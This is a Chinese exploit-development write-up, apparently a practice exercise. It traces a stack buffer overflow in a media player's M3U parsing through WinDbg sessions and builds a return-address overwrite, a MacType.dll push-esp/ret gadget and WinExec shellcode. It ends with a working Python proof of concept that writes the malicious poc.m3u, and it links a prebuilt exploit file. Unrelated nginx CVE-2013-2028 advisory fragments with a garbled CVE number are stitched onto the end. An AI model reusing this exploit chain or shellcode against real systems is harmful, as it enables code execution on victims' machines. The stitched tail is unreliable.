msvcrt!fscanf+0x1b:
76cf58d4 83c414 add esp,14h
0:000> gu
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
eax=00000001 ebx=0018fb64 ecx=76cf587e edx=76d22960 esi=76d22960 edi=76cf58b9
eip=004046f0 esp=0018f924 ebp=00000001 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
image00400000+0x46f0:
004046f0 83c40c add esp,0Ch
没代码没符号光看十分 ,简单的判断一下出问题的区域,此时再gu一次
0:000> gu
(2304.288): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=75cf54f8 ecx=76c93dcf edx=0008e3c8 esi=00000000 edi=01d5004c
eip=41414141 esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
41414141 ?? ???
eip跳到了41414141,看来是覆盖了retn的地址。
重来,从之前的image00400000+0x46f0往后一直p,然后到retn为止发现都没事儿,那估计就是这个retn导致的:
Breakpoint 0 hit
eax=00000000 ebx=75cf54f8 ecx=76c93dcf edx=0008e3c8 esi=00000000 edi=020e004c
eip=00404744 esp=0018f93c ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
image00400000+0x4744:
00404744 81c40800 add esp,208h
0:000> dd esp
0018f93c 0055334d 00000003 0088d550 00000016
0018f94c 00000000 01000003 00000000 00000016
0018f95c 00005765 0018f898 77aa57d0 0018f9d0
0018f96c 0018f99c 77ac0806 00870000 00000000
0018f97c 00870000 0088d108 77a1b8ea 0088d108
0018f98c 00870000 00870000 77a1b8ea 0088d108
0018f99c 0018f9e0 77ac17b0 00870138 77ac1794
0018f9ac 66f6ed3b 00870000 00870000 00000000
0:000> p
eax=00000000 ebx=75cf54f8 ecx=76c93dcf edx=0008e3c8 esi=00000000 edi=020e004c
eip=0040474a esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
image00400000+0x474a:
0040474a c3 ret
查看对应栈:
0:000> dd esp
0018fb44 41414141 41414141 41414141 41414141
0018fb54 41414141 41414141 41414141 41414141
0018fb64 41414141 41414141 41414141 41414141
0018fb74 41414141 41414141 41414141 41414141
0018fb84 43414141 43434343 43434343 43434343
0018fb94 43434343 43434343 43434343 43434343
0018fba4 43434343 43434343 43434343 43434343
0018fbb4 53434343 53535353 53535353 53535353
真是一个悲伤的故事啊……
由于倒数第二个是add esp,208h;那我们就倒回去看看:
0:000> dd esp-208 esp
0018f93c 0055334d 00000003 0088d550 00000016
0018f94c 00000000 01000003 00000000 00000016
0018f95c 00005765 0018f898 77aa57d0 0018f9d0
0018f96c 0018f99c 77ac0806 00870000 00000000
0018f97c 00870000 0088d108 77a1b8ea 0088d108
0018f98c 00870000 00870000 77a1b8ea 0088d108
0018f99c 0018f9e0 77ac17b0 00870138 77ac1794
0018f9ac 66f6ed3b 00870000 00870000 00000000
0018f9bc 00870000 00000000 01010000 0018f9ac
0018f9cc 00000068 0018fac4 77a671f5 114fc46b
0018f9dc fffffffe 77ac1794 77a7ac29 00870000
0018f9ec 50000063 77a238aa 66f6ee0f 00000000
0018f9fc 00870000 0088d110 00000000 00401270
0018fa0c 00000000 00de0706 00000084 00000000
0018fa1c 00680515 00000004 000003a8 00870000
0018fa2c 00000000 00000001 00000001 00000000
0018fa3c 00000000 415c3a41 41414141 41414141
0018fa4c 41414141 41414141 41414141 41414141
0018fa5c 41414141 41414141 41414141 41414141
0018fa6c 41414141 41414141 41414141 41414141
0018fa7c 41414141 41414141 41414141 41414141
0018fa8c 41414141 41414141 41414141 41414141
0018fa9c 41414141 41414141 41414141 41414141
0018faac 41414141 41414141 41414141 41414141
0018fabc 41414141 41414141 41414141 41414141
0018facc 41414141 41414141 41414141 41414141
0018fadc 41414141 41414141 41414141 41414141
0018faec 41414141 41414141 41414141 41414141
0018fafc 41414141 41414141 41414141 41414141
0018fb0c 41414141 41414141 41414141 41414141
0018fb1c 41414141 41414141 41414141 41414141
0018fb2c 41414141 41414141 41414141 41414141
0018fb3c 41414141 41414141 41414141
果然是一个悲伤的故事呀……
这个retn地址被覆盖的位置位于多少偏移处呢?
0:000> ?(18fa3c+4 - esp)
Evaluate expression: -260 = fffffefc
260,这个熟悉的数字,真是一个灾难。
找找ROP,发现MacType!ReloadConfig+0x24cca有一个很好很符合要求的ROP
---------------------- size 1
MacType!ReloadConfig+0x24cca:
1002756a 54 push esp
1002756b c3 ret
由于是在练手,所以咱也暂时不考虑通用性,查看WinExec的地址:
0:000> x kernel32!WinExec
768a2c51 kernel32!WinExec = 大概就勾画出了我们的SHELLCODE的原始形态: ROP 6a750210 #1002756a;MacType!ReloadConfig+0x24cca, push esp; ret; #Shellcode start $ 31C0 XOR EAX,EAX $+2 50 PUSH EAX $+3 B8 43414C43 MOV EAX,434C4143 $+8 50 PUSH EAX ;“CALC�” $+9 89E1 MOV ECX,ESP ;保存这个字符串的指针 $+B 40 INC EAX $+C 50 PUSH EAX ;uCmdShow == 1 $+D 51 PUSH ECX ;lpCmdLine $+E E8 XXXXXXX CALL WinExec 其实还要设置一个MOV EBX, ESP; DEC EBX,80H; MOV EBP,EBX;,这样才能保证WinExec不出错……INC EAX之前要XOR EAX,EAX一下,上面的是我之前打的草稿,我也偷个懒不贴机器码啦,OD里面一放就能查到 编辑M3U文件,载入运行(如下图所示) *** WARNING: Unable to verify checksum for E:Program Files (x86)Mplaymplay.exe *** ERROR: Module load completed but symbols could not be loaded for E:Program Files (x86)Mplaymplay.exe 0:001> g Breakpoint 0 hit eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c eip=0040474a esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 mplay+0x474a: 0040474a c3 ret 0:000> p eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c eip=1002756a esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 *** WARNING: Unable to verify checksum for E:Program Files (x86)MacTypeMacType.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for E:Program Files (x86)MacTypeMacType.dll - MacType!ReloadConfig+0x24cca: 1002756a 54 push esp 0:000> eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c eip=1002756b esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 MacType!ReloadConfig+0x24ccb: 1002756b c3 ret 0:000> eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb48 esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 0018fb48 31c0xor eax,eax 0:000> eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb4a esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 0018fb4a 50 push eax 0:000> eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb4b esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 0018fb4b b843414c43mov eax,434C4143h 0:000> eax=434c4143 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb50 esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 0018fb50 50 push eax 0:000> eax=434c4143 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb51 esp=0018fb40 ebp=00000001 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 0018fb51 89e1mov ecx,esp 0:000> eax=434c4143 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb53 esp=0018fb40 ebp=00000001 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 0018fb53 40 inc eax 0:000> eax=434c4144 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb54 esp=0018fb40 ebp=00000001 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 0018fb54 50 push eax 0:000> eax=434c4144 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb55 esp=0018fb3c ebp=00000001 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 0018fb55 51 push ecx 0:000> eax=434c4144 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c eip=0018fb56 esp=0018fb38 ebp=00000001 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 0018fb56 e8fb307176call kernel32!WinExec+0x5 (768a2c56) 0:000> dd esp 0018fb38 0018fb40 434c4144 434c4143 00000000 0018fb48 b850c031 434c4143 40e18950 fbe85150 0018fb58 00767130 00000000 00000000 555c3a45 0018fb68 73726573 616c425c 53547473 7365445c 0018fb78 706f746b 6d2e375c 75007533 008fb710 0018fb88 00000000 ffffffec 00000000 020e4758 0018fb98 020e4758 008fb710 008fb710 0018fbe4 0018fba8 754a702c 008fb710 00000000 ffffffec 0:000> da 18fb40 0018fb40 “CALC” 注:Debug模式下MacType模块是不会注入的,所以如果要测试着玩的话,还是要让它自己跑再Attach才可以 POC: print “blast off!” filepath = “poc.m3u” f = open(filepath, “wb”) file = 'x23x45x58x54x4dx33x55x0dx0ax90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x6ax75x02x10x31xc0x50xb8x43x41x4cx43x50x89xe1x40x50x51xe8xfbx30x71x76x00' f.write(file) f.close print “Done.nOpen poc.m3u” 弄好的二进制文件:lno.pw/exp.m3u,由于为了省事,没有用通用的方式处理,所以WinExec地址请自行修改 修复方案: 使用_s安全输入函数 CVE--2028:nginx 在处理某些畸形的HTTP请求长度值时存在问题,攻击者利用此漏洞可能造成栈溢出从而执行任意代码,最低限度可造成拒绝服务攻击, 受影响的软件及系统:nginx 1.3.9-1.4.0 解决方法:NSFOCUS建议您升级到nginx 1.4.1或nginx 1.5.0。 在CVE-2013-2028发布的几天之后,Vnsecurity组织已经成功通过程序溢出对此漏洞进行了深度的利用。但是,为了让漏洞利用程序在真实的渗透环境中更具可靠性和有效性,Vnsecurity组织仍然尝试开发出不同的攻击载荷。自从针对Nginx 32-bit的漏洞利用程序出现在 Metasploit 后,Vnsecurity组织决定公开一些他们的作品。在本文,你会找到如何快速分析出Nginx的漏洞,进而通过使用Vnsecurity组织提供的溢出攻击载荷来对64 位的Linux漏洞进行有效的利用。 91ri.org:metasploit中已有Nginx 32-bit的漏洞利用程序,大家可以自行搜索并测试。:) ★iShowMusic V1.2 写入shell漏洞漏洞预警 文档为doc格式0:001> bp 40474a#!/usr/bin/env python篇17:Nginx 1.3.9、1.4.0缓冲区溢出漏洞以及64位下的漏洞利用分析漏洞预警
篇18:Nginx 1.3.9、1.4.0缓冲区溢出漏洞以及64位下的漏洞利用分析漏洞预警
